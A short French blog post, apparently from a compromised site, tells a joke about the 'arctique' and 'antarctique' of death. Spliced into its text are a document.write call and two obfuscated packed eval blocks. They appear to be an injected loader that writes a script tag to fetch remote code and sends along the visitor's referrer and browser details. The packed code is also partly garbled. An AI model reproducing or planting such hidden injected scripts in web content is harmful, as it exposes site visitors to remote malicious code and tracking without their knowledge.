Ultima forsan

Alors que je discutais avec des collègues des moments où il était permis de prendre sans problème un congé de maladie, document.write(“”); la définition de “l’arctique de la mort” est venu sur le sujet.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ydbsi|var|u0026u|referrer|bisbe||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|btdti|var|u0026u|referrer|eiahn||js|php’.split(‘|’),0,{}))

J’ai donc expliqué que, selon moi, l’“arctique” de la mort c’était quand on arrivait au bout du chemin, passé l’extrème jonction, dans le dead-end de l’existance. On a très froid, tout devient blanc autour de nous et la lumière est aveuglante. Toutefois, ai-je précisé, si tout le monde autour de vous est habillé en tuxedo noir et blanc alors c’est une situation totalement différante: on se retrouve alors dans l’“antarctique” de la mort! ;>